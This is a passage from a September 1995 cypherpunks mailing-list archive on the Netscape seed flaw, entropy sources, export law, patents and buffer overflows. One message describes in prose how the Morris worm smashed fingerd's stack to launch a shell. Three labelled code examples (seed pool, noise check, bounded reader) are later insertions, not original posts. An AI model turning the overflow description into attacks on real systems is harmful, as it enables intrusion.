> with the rest of the world.  The changes that I've heard are
> 1) Go to first-to-file instead of first-to-invent
[...]

Does this mean that prior art would no longer invalidate a patent?
-- 
Shields.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shields@tembel.org (Michael Shields)
Date: Thu, 21 Sep 95 12:03:13 PDT
To: junger@pdj2-ra.F-REMOTE.CWRU.Edu (Peter D. Junger)
Subject: Re: Munitions shirt (again)
In-Reply-To: <m0svlNY-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>
Message-ID: <m0svqta-000DWsC@yage.tembel.org>
MIME-Version: 1.0
Content-Type: text/plain


> There is nothing in the ITAR that refers to ``machine-readable'' so
> there is no need to interpret that term.  

The issue is that it has been formally used as the criterion that
distinguishes "technical data" from "defense articles".  See Phil Karn's
CJ requests on the _Applied Cryptography_ book and floppy.

<URL:ftp://ftp.cygnus.com/pub/export/>
-- 
Shields.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an5877@anon.penet.fi (deadbeat)
Date: Thu, 21 Sep 95 12:38:49 PDT
To: cypherpunks@toad.com
Subject: Fraud Can Flourish Without the Internet
Message-ID: <9509211915.AA28667@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

The New York Times
Letters
Thursday, September 21, 1995

Fraud Can Flourish Without the Internet

To the Editor:
  Your Sept. 19 front-page article on the discovery by two University of
California graduate students of a flaw in Netscape, the software used
for purchases over the Internet's World Wide Web, raises a number of
obvious questions.
  First, who needs high tech to perpetrate fraud?  Any unscrupulous
commercial employee could use or sell your credit card number without
employing technology.
  Every time you hand your card to a waiter in a restaurant, it
disappears for several minutes.  The department store clerks and gas
station attendants you deal with also have access to your card number.
How secure is that?
  Ever give your credit card number over the phone to make a purchase
from a mail-order house?  Or to secure a reservation at a hotel?  Who's
to say that the employees you're speaking with are honest?  Or that your
phone is not tapped?  Or theirs?
  I shop on the Internet; I may get ripped off.  What's my liability?
Fifty bucks -- same as the other scenarios I've described.  That's in my
credit agreement with the card issuer.
  So why all the hoopla?  Is credit card fraud significantly more
prevalent on the Internet than in other modes of purchasing?
  Or is the banking industry whipping up hysteria among purchasers to
curb fraud losses?  Was the work of those graduate students funded by
someone -- directly or indirectly?  If so, by whom?  A banking
consortium?  A high-tech company working on some patentable security
scheme?               ROBERT HERRIG
    Peekskill, N.Y., Sept. 19, 1995
The writer is a systems consultant.


DEADBEAT <na5877@anon.penet.fi>
for the I.L.F.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBFAgUBMGFgp/FZTpBW/B35AQFiuAF/c7DUidkXEe1oBdRpsmfzkXzii44qFPQ3
YQui2lORNA8RUaWiB25poSLFNdiBMJnX
=duqf
-----END PGP SIGNATURE-----
----------------------------------------------------------------------------
To find out more about the anon service, send mail to help@anon.penet.fi.
If you reply to this message, your message WILL be *automatically* anonymized
and you are allocated an anon id. Read the help file to prevent this.
Please report any problems, inappropriate use etc. to admin@anon.penet.fi.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Van Wie <dvw@hamachi.epr.com>
Date: Thu, 21 Sep 95 18:38:56 PDT
To: "'cypherpunks'" <cypherpunks@toad.com>
Subject: RE: Prosecution of Cracking Security Systems
Message-ID: <30621328@hamachi>
MIME-Version: 1.0
Content-Type: text/plain



Tim May wrote:

> One thing that worries me is that some of the proposed laws about
> intellectual property and enforcement of copyrights may make it illegal to
> try to break the cryptographic protections of systems, even systems one has
> control over. (Some similarities to the "no reverse engineering"
> shrink-wrap licenses.)
>
> It's conceivable that Netscape Communications could, under these
> "anti-hacking" laws, seek a prosecution of some future Goldberg and Wagner.

Actually, Lehman's report does not recommend this harsh of a measure.  The 
report recommends penalties (some criminal) for tampering with and disabling 
mechanisms that are protecting copyright for protected works, and the 
protected works themselves.  If a hacker operating in the "public service" 
mode you described were tampering with and/or disabling a protection 
mechanism that was applied to their own works, or test patterns and the 
like, they wouldn't fall under the recommended guidelines.  It is pretty 
clear from my reading that you need to have an intent to violate copyright 
(i.e. steal stuff) in order to trigger the penalties.

Who knows how badly Congress will mangle all of this...

dvw




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Van Wie <dvw@hamachi.epr.com>
Date: Thu, 21 Sep 95 18:53:54 PDT
To: "'cypherpunks'" <cypherpunks@toad.com>
Subject: Re: Patents and trade secrets was: Encryption algorithms used in PrivaSoft
Message-ID: <306216B6@hamachi>
MIME-Version: 1.0
Content-Type: text/plain



>> Now, this is all expected to change, to become more harmonious
>> with the rest of the world.  The changes that I've heard are
>> 1) Go to first-to-file instead of first-to-invent

Michael Shields wrote:

> Does this mean that prior art would no longer invalidate a patent?

No.  It just moves the prior art date from the date of invention to the date 
of filing the patent application.

dvw




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Thu, 21 Sep 95 02:59:56 PDT
To: cwe@Csli.Stanford.EDU (Christian Wettergren)
Subject: Exchange random numbers (was: Re: netscape's response)
In-Reply-To: <199509210153.SAA25449@Csli.Stanford.EDU>
Message-ID: <199509210958.TAA10764@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello Bill Stewart <stewarts@ix.netcom.com>
  and cypherpunks@toad.com, "Jeff Weinstein" <jsw@netscape.com>
  and Christian Wettergren <cwe@Csli.Stanford.EDU>

Christian Wettergren <cwe@Csli.Stanford.EDU> writes:
> Christian (that's me) writes:
> | One wild idea that I just got was to have servers and clients exchange
> | random numbers (not seeds of course), in a kind of chaining way. Since
...
> Bill Stewart answered:
> | Be _very_ careful with this approach - it's the kind of thing that a
> | rogue server or client might abuse to find out randomness or other state
...
> Of course you have to be very careful, as you say. Did you see my
> problem-section in the original letter? I included it above.
... [the referenced section elided by jirib] ...

If I only ever give out a hash of my seed, and only ever *add* any received
info to my seed (and stir it in well), how can anyone find out anything?
(Apart from hash weaknesses.)


The only thing that remains is that I cannot really count on a stranger
to actually give me something truly random. In fact, since at least
one other person knows it, I shouldn't count any entropy from it at all.

However, if I get e bits from each of n servers, and k of them are rogue,
then I have e*(n-k) bits, ie e*n*(1-k/n). With a suitably conservative
estimate of k/n, this should be acceptable.

In any case, accepting donations of entropy cannot possibly reduce the
amount of entropy I have, can it?


As well as the normal servers, there might be dedicated randomness servers
whose sole purpose is to give you a random number. For a toy example, see

  http://www.cs.monash.edu.au/cgi-bin/cgiwrap/~jirib/random?ToyRandValue

(where ToyRandValue should be replaced by whatever your random value is).

Again, one would connect to several and stir the results together,
confident in the statistics that say at least one is genuine.

Of course, we then have a chicken-and-egg problem of getting secure
connection to the randomness servers, but we have that anyway. Perhaps each
client could keep a pool of randomness, and whenever it runs low connect
to the randomness servers to re-fill, initially using "type random text".

...
> and that you should only give out approximately the same amount of 
> randomness to the neighbour, as you point out below.
...

I'm not sure I follow this one. Why?

If the neighbour is willing to trust me for more, and cannot possibly
deduce my seed from the numbers ('cause it's a strong 1-way hash),
the only thing it costs me is CPU time - it'd cost me more to keep
track of who asked for how much when.

...
> My approach solves part of the problem of "the observable local
> environment" problem. 
...

Then again, you can always ping. With a well-chosen target, you get
10 bits raw from the first packet... Perhaps about 7 or 8 of actual
usable entropy (and before you flame me, ping melb.dialix.oz.au).


Part of this is that once the sources of randomness are sufficiently
diverse, it's just easier for an attacker to modify your s/w.
Especially if you never throw out your seed, so that all your interactions
since the beginning are unfathomably stirred into your current key.

(Ie I might not mind if I have only 1 bit of entropy per transaction
provided that the total entropy is 128 bits. Provided I never reveal
my seed, of course. This would mean that the value risked on any
particular 128 bits are 128 of my transactions, not just one, but for
most people each of those transactions will involve the same CC number
so it makes no difference anyway.)


Hope that makes sense...

Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMGE3JixV6mvvBgf5AQFcWwP/UMbLaF2IM7y8HAjVUOCRoE4xgp+XkAj9
zQAnd0XnW5nbwqoXJe/WiT/4QQ3Rx/2tV8OhskS1dhy/7WEZ1WtTsEu4Of3YUDJp
rOYf5omToxLVXWNUQrCYUtGUjJo2UdUg2N8NfIR+vXrsZG7HPhfXsrRD9C0W1HJw
yIfcZUzz+s4=
=KJsK
-----END PGP SIGNATURE-----
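
[Added example, not part of the thread: a seed pool that combines the mouse-click collection Vince Cate suggests earlier in this archive with the rules in the message above (give out only a hash of the seed, only ever add received data, credit donations as e*n*(1-k/n)). SHA-256 stands in for the MD5 discussed on the list; the class and function names, the 2-bit credit per click and the sample clicks are assumptions.]

```python
"""Hash-stirred seed pool with a conservative entropy estimate."""
import hashlib
import struct


class NotEnoughEntropy(Exception):
    pass


def donation_credit(bits_each, n, rogue_fraction):
    """Entropy credit for values from n parties: e*n*(1 - k/n)."""
    if not 0.0 <= rogue_fraction <= 1.0:
        raise ValueError("rogue_fraction must be between 0 and 1")
    return bits_each * n * (1.0 - rogue_fraction)


class SeedPool:
    def __init__(self):
        self._state = bytes(32)    # the seed itself is never handed out
        self._counter = 0
        self.credited_bits = 0.0   # conservative estimate; never decreases

    def _stir(self, label, data):
        # Inputs are only ever added: the new state is a hash of the old
        # state and the input, so a chosen input cannot overwrite the pool.
        h = hashlib.sha256(self._state)
        h.update(label + struct.pack(">I", len(data)) + data)
        self._state = h.digest()

    def _extract(self, label):
        # One-way output, then move the state forward so the same value is
        # never produced twice.
        self._counter += 1
        tag = label + struct.pack(">Q", self._counter)
        out = hashlib.sha256(tag + self._state).digest()
        self._stir(b"ratchet", tag)
        return out

    def add_mouse_click(self, t_usec, x, y, bits=2.0):
        """Stir in one click. `bits` is an assumed, deliberately low credit."""
        self._stir(b"mouse", struct.pack(">QHH", t_usec, x, y))
        self.credited_bits += bits

    def add_donations(self, values, bits_each, rogue_fraction):
        """Stir in values received from other parties, discounting rogues."""
        credit = donation_credit(bits_each, len(values), rogue_fraction)
        for v in values:
            self._stir(b"remote", v)
        self.credited_bits += credit

    def public_value(self):
        """What a peer may be given: a hash of the seed, never the seed."""
        return self._extract(b"public")

    def key(self, key_bits):
        """Derive a key only once the credit covers every key bit."""
        if key_bits % 8 or not 0 < key_bits <= 256:
            raise ValueError("key_bits must be a multiple of 8, at most 256")
        if self.credited_bits < key_bits:
            raise NotEnoughEntropy(
                f"{self.credited_bits:.0f} of {key_bits} bits credited")
        return self._extract(b"key")[: key_bits // 8]


def constructed_clicks(n):
    """Constructed sample clicks (microsecond time, x, y); predictable by
    design, so they exercise the bookkeeping only."""
    return [(1_000_000 + i * 137_911, (i * 37) % 640, (i * 91) % 480)
            for i in range(n)]


def demo():
    pool = SeedPool()
    for click in constructed_clicks(10):      # 20 bits credited
        pool.add_mouse_click(*click)
    try:
        pool.key(128)
        refused = False
    except NotEnoughEntropy:
        refused = True
    for click in constructed_clicks(64)[10:]:  # now 128 bits credited
        pool.add_mouse_click(*click)
    return refused, pool.key(128)


if __name__ == "__main__":
    refused, key = demo()
    print("refused early key request:", refused)
    print("128-bit key:", key.hex())
```

[Passing rogue_fraction=1.0 credits nothing for received values, the most conservative reading of the message above; the values are still stirred in.]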



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 21 Sep 95 19:56:27 PDT
To: cypherpunks@toad.com
Subject: Was the Netscape Flaw Over-Publicized?
Message-ID: <ac8774ca4b0210047fa5@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:51 PM 9/21/95, Joe Tardo wrote:

>I can really empathize with what the developers at Netscape must be going
>through, but the 'social good' of raising security flaws to the level of the
>front page of the NYT is hard to deny.  Rather than saying "security through
>obscurity is bad" you can point to a precedent of the consequences of being
>found out.

Furthermore, Ian Goldberg's message on Sunday night was a factual,
unsensationalized report of something he and Wagner discovered. The very
essence of objective reporting, I thought.

That so many reporters found it a newsworthy, even headline-worthy, story
is related to other factors.

--Tim May


Notice: Don't expect me to reply to trivial questions and complaints.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Thu, 21 Sep 95 20:18:02 PDT
To: cypherpunks@toad.com
Subject: Re: Patents and trade secrets was: Encryption algorithms used in PrivaSoft (fwd)
Message-ID: <ac87e6a600021004df72@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 9:47 PM 9/20/95, Ian Goldberg wrote:
....
>   - Ian "I heard that 'x*y=[(x+y)/2]^2 - [(x-y)/2]^2' is a patented way
>		   to multiply numbers of the same parity.  Can anyone verify this
>		   and/or produce a reference?"
....
That trick is probably at least 200 years old. There were once
"quarter square" tables published that started
  i     q(i)
000 000
001 000
002 001
003 002
004 004
005 006
etc.
i [1^2/4]

It works for all parities. ab = q(a+b) - q(a-b)

These tables were published in nautical navigation books.

Mechanical analog computers sometimes used this trick to
multiply shaft positions. There would be a cam that computed
the square of one angle, expressed as another angle.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Josh M. Osborne" <stripes@va.pubnix.com>
Date: Thu, 21 Sep 95 17:19:30 PDT
To: iang@cs.berkeley.edu
Subject: Re: XDM has the same problem as netscape ?!
In-Reply-To: <43s1j7$nd3@calum.csclub.uwaterloo.ca>
Message-ID: <UAA01743.199509220019@garotte.va.pubnix.com>
MIME-Version: 1.0
Content-Type: text/plain


In message <43s1j7$nd3@calum.csclub.uwaterloo.ca>, Ian Goldberg writes:
>In article <9509210631.AA18308@sfi.santafe.edu>,
>Nelson Minar <nelson@santafe.edu> wrote:
>>Last time I looked, the MIT-MAGIC-COOKIE-1 scheme used in X11R4 had
>>the same problem: the random seed was based on the current time to the
>>microsecond, modulo the granularity of the system clock. I think I
>>figured that on my hardware, if I could figure out which minute the X
>>server started (easy with finger), I'd only have to try a few
>>thousand keys or so. Caveat: I never actually proved the idea.
>
>Wow.  I just checked, and Nelson's right.
[...]

Of course you can do what I have been doing for years:

# placeholder command: substitute any good source of random hex strings
cookie=`good-source-or-random-hex-strings`
xauth add $DISPLAY MIT-MAGIC-COOKIE-1 $cookie
xinit ~/.xinitrc $DISPLAY -- $server :$port -auth $XAUTHORITY

(assuming you set the various variables correctly)

This will allow you to generate your own cookies rather than
relying on MIT.  (I actually have C code to set the cookie directly,
since I don't really care to have it visible to ps, even briefly).

Unfortunately X will blat the "secret" out in the clear every time you
make an X connection, so it still isn't very good.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rmtodd@servalan.servalan.com (Richard Todd)
Date: Thu, 21 Sep 95 19:06:20 PDT
To: cypherpunks@toad.com
Subject: Re: "Gnusaic"? Why not a Gnu-Style Web Browser?
In-Reply-To: <ac87162a440210044474@[205.199.118.202]>
Message-ID: <m0svxOg-000772C@servalan.servalan.com>
MIME-Version: 1.0
Content-Type: text/plain


In servalan.mailinglist.cypherpunks Tim May writes:
>Why not a Gnu-style Web browser? I don't know if the original Mosaic can be
>used and added to, but I can imagine something like this could be done.

Um, if you mean "freely distributable, in source form" by "Gnu-style",
I don't think there's much of a shortage of Gnu-style WWW browsers and servers. 
Lynx and Chimera are my two favorite WWW browsers, and both come in source form.
Then there's w3.el, the WWW browser for Emacs.   As for Web servers, you can
get the source code for Plexus or CERN httpd off the net.  Plus, doesn't
Eric Young have someone's httpd already hacked to include SSL-compliant
encryption?

The question becomes why don't the free WWW software people out there now
support crypto?  Maybe they're simply not expert in or interested in crypto,
or maybe they don't want to mess with the ITAR hassles. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Thu, 21 Sep 95 21:13:39 PDT
To: dmandl@panix.com (David Mandl)
Subject: Re: Netscape closes up 1 3/8 today!
In-Reply-To: <v01530503ac87c0c951e6@[166.84.250.21]>
Message-ID: <199509220408.VAA10258@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> At 1:30 PM 9/21/95, sameer wrote:
> >        The only bad publicity is no publicity.
> 
> This assumes that you're trying to sell something.  Some people actually
> have no use or desire for publicity.  Publicity has caused a quick and
> painful death to many scenes, movements, cabals, and "temporary autonomous
> zones."

	Yes, this is a good point. If you are trying to sell
something, then, the only bad publicity is no publicity. But you are
describing cases where -any- publicity is detrimental to the "thing",
in which case the publicity, "bad" or "good", is "bad".

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 21 Sep 95 18:28:55 PDT
To: MIGUELDIAZ@megaweb.com (Miguel Diaz)
Subject: Re: Seeds which depend on machine states
In-Reply-To: <199509211044.GAA25896@mail-e1a.megaweb.com>
Message-ID: <199509220128.VAA01900@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Miguel Diaz writes:
> It is my suspicion that seeds which depend on machine 
> states(ie state of your computer at a specific instance of 
> time) would always be subject to scrutiny and de-cryption.
> As long as the software used to encrypt is not self-modifying, 
> the machine state can (through careful manipulation involving 
> temperature, clocks, processes etc)always be replicated and 
> fixed to an acceptable degree.

Try getting a human to type with the same timing, to microsecond
precision, the same way twice.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dmandl@panix.com (David Mandl)
Date: Thu, 21 Sep 95 18:31:04 PDT
To: sameer <sameer@c2.org>
Subject: Re: Netscape closes up 1 3/8 today!
Message-ID: <v01530503ac87c0c951e6@[166.84.250.21]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:30 PM 9/21/95, sameer wrote:
>        The only bad publicity is no publicity.

This assumes that you're trying to sell something.  Some people actually
have no use or desire for publicity.  Publicity has caused a quick and
painful death to many scenes, movements, cabals, and "temporary autonomous
zones."

   --Dave.

--
Dave Mandl
dmandl@panix.com
http://wfmu.org/~davem






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Yih-Chun Hu <yihchun@u.washington.edu>
Date: Thu, 21 Sep 95 21:38:47 PDT
To: Joe Block <jpb@miamisci.org>
Subject: /dev/audio RNG
In-Reply-To: <v01520c05ac87bbe891da@[199.227.2.142]>
Message-ID: <Pine.OSF.3.91j.950921212806.29336B-100000@saul1.u.washington.edu>
MIME-Version: 1.0
Content-Type: text/plain



I've been working on a Linux RNG. I'm sure you could port this, but it 
might take some work for Microsoft based programs...

--- CLIP HERE ---
#!/usr/bin/perl   
($b,$s)=@ARGV;$b/=16;open(A,"/dev/audio");while($b--){$t=time;$t+=
$s||die"Syntax: $0 bytes security\n";open(O,"|./md5");while(time<$t){
read(A,$x,500);print O $x;}close O;}close A;print"\n";

# USAGE: rng <bytes> <security level>. One external command is used:
# ./md5 which I created using 
#   gcc -O3 -mpentium -o md5 md5.c md5drivr.c 
# where md5drivr.c is modified so that MDFilter()'s line printf("\n")
# is commented out.
--- CLIP HERE ---

Runtime = security * (bytes/16) assuming your machine is fast enough.
Each set of 16 bytes uses $s seconds of /dev/audio input to create.
I guess you could replace /dev/audio with /dev/mouse. Of course, if you
get nothing but d41d8cd98f00b204e9800998ecf8427e you may want to use
some other source. :)

+---- Yih-Chun Hu (finger:yihchun@cs.washington.edu) ----------------------+
| http://www.cs.washington.edu/homes/yihchun     yihchun@cs.washington.edu |
| http://weber.u.washington.edu/~yihchun         yihchun@u.washington.edu  |
+---- PGP Key Fingerprints (Keys by FINGER or on WWW) ---------------------+
| 1024/E50EC641        B2 A0 DE 9E 36 C0 EB A6  F9 3E D2 DD 2F 27 74 79    |
| 2047/DF0403F9        18 EB 62 C8 7F 06 04 67  42 76 24 E2 99 D1 07 DC    |
+--------------------------------------------------------------------------+
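
Added example, not part of the original post: the all-d41d8cd98f00b204e9800998ecf8427e output mentioned above is the MD5 of empty input, meaning the device returned no data. The C sketch below checks each batch of samples before it is hashed and rejects an empty, stuck or two-level source; check_samples, the cutoffs and the sample buffers are assumptions constructed for illustration.

```c
#include <stddef.h>
#include <stdio.h>

/* Verdict for one batch of raw samples read from the noise source. */
enum src_health { SRC_OK = 0, SRC_EMPTY, SRC_STUCK, SRC_BIASED };

/* Cutoffs are illustrative assumptions, not values from the post. */
#define RUN_CUTOFF   21    /* this many identical samples in a row fails */
#define PROP_WINDOW  512   /* samples per proportion window */
#define PROP_CUTOFF  200   /* this many copies of one value per window fails */

/*
 * Gross-failure checks only: a batch that passes is not thereby
 * unpredictable, it is merely not obviously dead.
 */
enum src_health check_samples(const unsigned char *buf, size_t n)
{
    size_t i, run = 1;

    if (buf == NULL || n == 0)
        return SRC_EMPTY;               /* hashing this gives MD5("") */

    /* Repetition count: a muted or unplugged input repeats one value. */
    for (i = 1; i < n; i++) {
        run = (buf[i] == buf[i - 1]) ? run + 1 : 1;
        if (run >= RUN_CUTOFF)
            return SRC_STUCK;
    }

    /* Proportion: in each full window, count copies of its first value. */
    for (i = 0; i + PROP_WINDOW <= n; i += PROP_WINDOW) {
        size_t j, hits = 0;

        for (j = 0; j < PROP_WINDOW; j++)
            if (buf[i + j] == buf[i])
                hits++;
        if (hits >= PROP_CUTOFF)
            return SRC_BIASED;
    }
    return SRC_OK;
}

/* Constructed sample inputs standing in for reads from /dev/audio. */
enum src_health demo_verdict(int kind)
{
    static unsigned char buf[1024];
    size_t i, n = sizeof buf;

    switch (kind) {
    case 0:                             /* device returned nothing */
        n = 0;
        break;
    case 1:                             /* constant level: muted input */
        for (i = 0; i < n; i++)
            buf[i] = 0xff;
        break;
    case 2:                             /* two-level signal, no long runs */
        for (i = 0; i < n; i++)
            buf[i] = (i & 1) ? 0x80 : 0x7f;
        break;
    default:                            /* varying (but deterministic) data */
        for (i = 0; i < n; i++)
            buf[i] = (unsigned char)(37 * i + i / 8);
        break;
    }
    return check_samples(buf, n);
}

int main(void)
{
    static const char *name[] = { "ok", "empty", "stuck", "biased" };
    int k;

    for (k = 0; k < 4; k++)
        printf("case %d: %s\n", k, name[demo_verdict(k)]);
    return 0;
}
```

The last case passes even though it is fully deterministic, which is the limit of this kind of check: it catches a dead source, not a predictable one.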





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tomw@orac.engr.sgi.com (Tom Weinstein)
Date: Thu, 21 Sep 95 22:33:41 PDT
To: perry@piermont.com
Subject: Re: netscape bug
In-Reply-To: <199509212242.PAA04533@orac.engr.sgi.com>
Message-ID: <199509220503.WAA05140@orac.engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <199509220443.AAA02254@frankenstein.piermont.com>, "Perry E. Metzger" <perry@piermont.com> writes:

> Tom Weinstein writes:
>> While it is certainly true that you can stomp on memory in static
>> buffers, it's not clear that you can execute whatever code you insert
>> there.  If the buffer happens to be allocated off the stack (and the
>> stack grows down) then you can modify the return address.  Of course,
>> you have to know the address of whatever code you want to execute.

> Let's say, Mr. Weinstein, that you shove some code onto the stack along
> with the return address, and the address happens to be the code.

I never disputed that it could be done, I was just uncertain as to how
easy it would be.  As has been pointed out, it's not nearly as hard as I
thought, assuming you can execute in the stack.

> If you don't believe it can be done, it's easy enough to demonstrate it
> on your machines, which I believe suffer from the syslog(3) bug, which
> your company hasn't patched so far as I know, and which afflicts the
> Sendmail daemons you ship with your machines. See the recent 8lgm bug
> report if you want details.

Hmm, could you explain how to exercise this bug?  Perhaps a sample
program?

>> Of course, that also assumes that you can execute from the data area
>> which is not always true.

> It's usually true on modern machines -- it's very difficult to rig
> things otherwise given the way that lots of the dynamic loading works
> these days.

True.

-- 
Sure we spend a lot of money, but that doesn't mean    |  Tom Weinstein
we *do* anything.  --  Washington DC motto             |  tomw@engr.sgi.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Sommerfeld <sommerfeld@orchard.medford.ma.us>
Date: Thu, 21 Sep 95 19:19:20 PDT
To: tomw@cthulhu.engr.sgi.com
Subject: Re: netscape bug
In-Reply-To: <199509212242.PAA04533@orac.engr.sgi.com>
Message-ID: <199509220208.CAA00564@orchard.medford.ma.us>
MIME-Version: 1.0
Content-Type: text/plain


> I question the accuracy of this.  The fingerd bug was that a string in
> the static data area was read in with gets which could be overflowed.
> At some point in memory after this input buffer was the string constant
> that stored the name of the finger command.  What the Morris work did
> was to overflow the input buffer and replace the string constant
> "finger" with "csh".  When fingerd then exec'ed the command, that gave
> you a shell running on the machine.

Nope, that wasn't it, either.

See the Eichin/Rochlis "tour of the worm" paper.  

I was visiting friends at MIT the night the worm hit.  After receiving
some confused and unspecific reports that the worm was getting in
through fingerd, I had a flash of insight as to how that might happen;
as it turned out, this insight was correct, and shortly thereafter, I
had reproduced a benign form of the fingerd attack.  As implemented by
the worm, it only worked on vaxes, but it could have worked on other
systems.

The buffer in question was on the stack, not in static storage.

The attacker wrote a long sequence of NOP's, followed by machine
instructions which implemented the equivalent of exec("/bin/sh"),
followed by the approximate stack address of the stack buffer; the
last address was at the right place to overwrite the saved PC field in
the stack frame.  When the routine "returned", it actually branched
into the runway of NOP's, and then exec'ed "/bin/sh".

Note that the actual stack address varied, as environment variables
(which tend to vary from installation to installation) are located at
the top of the stack.

As it turned out, the attack did not work on most Athena systems,
because the athena /etc/rc complex wound up using a large number of
environment variables which pushed the location of the stack frame in
question out of the range where the attack would have worked.

					- Bill
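
Added example, not part of the original message: the defensive counterpart to the overflow described above, in C. The request line goes into a fixed stack buffer through a reader that enforces the buffer's capacity, and an over-long line is consumed and rejected rather than written past the end as gets() would; read_request, nth_request, the 512-byte size and the sample bytes are assumptions.

```c
#include <stdio.h>
#include <string.h>

#define REQ_MAX 512   /* assumed size of the request buffer */

/*
 * Read one newline-terminated request into buf (capacity cap).
 * Returns the length stored, -1 at end of input, or -2 if the line did
 * not fit; an over-long line is consumed to its end and discarded, so
 * its tail cannot be mistaken for the next request.
 */
int read_request(FILE *in, char *buf, size_t cap)
{
    size_t len = 0;
    int c, too_long = 0;

    if (cap == 0)
        return -1;
    while ((c = getc(in)) != EOF && c != '\n') {
        if (len + 1 < cap)
            buf[len++] = (char)c;   /* always leaves room for the NUL */
        else
            too_long = 1;           /* keep reading, store nothing more */
    }
    if (c == EOF && len == 0 && !too_long) {
        buf[0] = '\0';
        return -1;
    }
    if (too_long) {
        buf[0] = '\0';
        return -2;
    }
    if (len > 0 && buf[len - 1] == '\r')
        len--;                      /* finger requests end in CRLF */
    buf[len] = '\0';
    return (int)len;
}

/*
 * Demo driver: the bytes in wire stand in for what arrives on the
 * socket. Reads (which + 1) requests and returns the last result,
 * leaving the last line in out.
 */
int nth_request(const char *wire, size_t n, int which, char out[REQ_MAX])
{
    FILE *f = tmpfile();
    int r = -1;

    if (f == NULL)
        return -1;
    if (fwrite(wire, 1, n, f) == n) {
        rewind(f);
        do {
            r = read_request(f, out, REQ_MAX);
        } while (which-- > 0 && r != -1);
    }
    fclose(f);
    return r;
}

int main(void)
{
    char wire[700], line[REQ_MAX];
    int r;

    memset(wire, 'A', 600);                  /* constructed over-long request */
    memcpy(wire + 600, "\r\nroot\r\n", 8);   /* followed by a normal one */

    r = nth_request(wire, 608, 0, line);
    printf("first request:  %d\n", r);
    r = nth_request(wire, 608, 1, line);
    printf("second request: %d (%s)\n", r, line);
    return 0;
}
```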




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Deranged Mutant <rrothenb@ic.sunysb.edu>
Date: Thu, 21 Sep 95 19:15:29 PDT
To: vince@offshore.com.ai (Vincent Cate)
Subject: Re: real randomness for netscape - user clicking mouse
In-Reply-To: <Pine.3.89.9509211743.A459-0100000@offshore.com.ai>
Message-ID: <199509220214.WAA16926@libws4.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain



> Why not just do something similar to what PGP does?  

Yes, why not... (it's been suggested before)

> For netscape you could have a user make circling motions with the mouse
> and clicking at random times.  For each click of the mouse you could get a
> few bits of randomness from the time, the X position, and the Y position. 
> You could get random bits really fast this way. 

Careful... the buttons one tends to click on are in the same regions,
and the entropy would not be as great as say, with keyboard timings.
I think fast timings between clicks (maybe added or xor'd with low bits
from mouse positions?) is a better solution.

Though the best way is to experiment... I wrote a DOS ISR to capture
timings between clicks ('keyrand?.zip' on some ftp-sites) and experimented
with speeding up the system clock (which is normally 18.2 times/sec), but
the entropy appeared lower (superficially less random).

-Rob




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 21 Sep 95 19:32:08 PDT
To: patrick@verity.com (Patrick Horgan)
Subject: Re: "random" number seeds vs. Netscape
In-Reply-To: <9509211553.AA17620@cantina.verity.com>
Message-ID: <199509220231.WAA02083@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Patrick Horgan writes:
> Perry said:
> > 
> > Also be especially careful about how you run the thing! Don't use
> > popen or anything like it!
> 
> There's nothing inherently wrong with using popen or system.

Nor is there anything inherently wrong with having sex without the use
of a condom.

However, it is very difficult -- VERY DIFFICULT -- to prove to
yourself that there is never an instance in which your system() or
popen() can be abused. In any case, I find it's often more prudent just
to strip all these things out of my code. If you don't use them, you
don't have to prove they are done properly. Paranoia is your
